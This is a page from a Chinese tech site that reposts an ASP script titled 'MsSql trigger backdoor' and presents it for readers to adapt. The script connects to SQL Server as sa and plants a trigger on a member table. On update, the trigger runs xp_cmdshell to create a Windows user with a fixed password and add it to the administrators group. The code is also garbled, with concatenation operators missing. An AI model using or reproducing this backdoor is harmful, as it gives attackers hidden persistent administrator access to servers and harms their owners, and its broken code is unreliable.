快讯资讯
手机优化
系统数码
网络通信人工智能
网站游戏
测评专题

  MsSql 触发器后门asp版       webshell 提权方法 服务器    

MsSql 触发器后门asp版

时间:2026-09-10 00:52 来源:未知 人气:

复制代码代码如下:
%
'里边的变量代码大家用时自己改吧
On Error Resume next
Set conn=Server.CreateObject("ADODB.Connection")
DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"
conn.Open DSN
if conn.State=1 then
response.write("成功")
sql="CREATE TRIGGER myasp_bkdoor"Chr(10)Chr(13)"ON users_member"Chr(10)Chr(13)"AFTER UPDATE"Chr(10)Chr(13)"AS"Chr(10)Chr(13)"IF user='dbo' OR user='sa'"Chr(10)Chr(13)"BEGIN"Chr(10)Chr(13)"PRINT 'dbo OR sa logon'"Chr(10)Chr(13)"EXEC master..xp_cmdshell'net user test 123456 /addnet localgroup administrators test /add'"Chr(10)Chr(13)"END"Chr(10)Chr(13)"ELSE"Chr(10)Chr(13)"BEGIN"Chr(10)Chr(13)"PRINT 'not dbo or sa privilage'"Chr(10)Chr(13)"END"Chr(10)Chr(13) '建立myasp_bkdoor触发器,触发baby库中的users_member表的update操作加用户
SQL1="update users_member set email=3 where accountid=1" '触发
'sql2="drop TRIGGER myasp_bkdoor"
set rs=conn.execute(SQL)conn.execute(SQL1,iRowsAffected, H0001)'conn.execute(SQL2) '触发
Do Until Rs.EOF
Response.Write " tr" vbNewLine
For I = 0 To Rs.Fields.Count - 1
Response.Write "td" SQLOut(oRs(I)) "/td" vbNewLine
Next
Response.Write " /tr" vbNewLine
Rs.MoveNext
Loop
else
response.write("失败")
end if
%
本文标签:

更多文章

相关文章

网站导航 | 快讯 | 资讯 | 手机

  • 系统 | 数码 | 网络通信 | 人工智能 | 网站 | 游戏

    合作伙伴:

  • 友情链接(欢迎业界知名网站交换链接)申请友情

    

    声明:本站资源皆来自网络,如有侵权问题,请联系管理员处理!

    Copyright ©2020-2028快知站 版权所有 All rights reserved.

    闽ICP备20010713号-1 闽公网安备 35020602001684号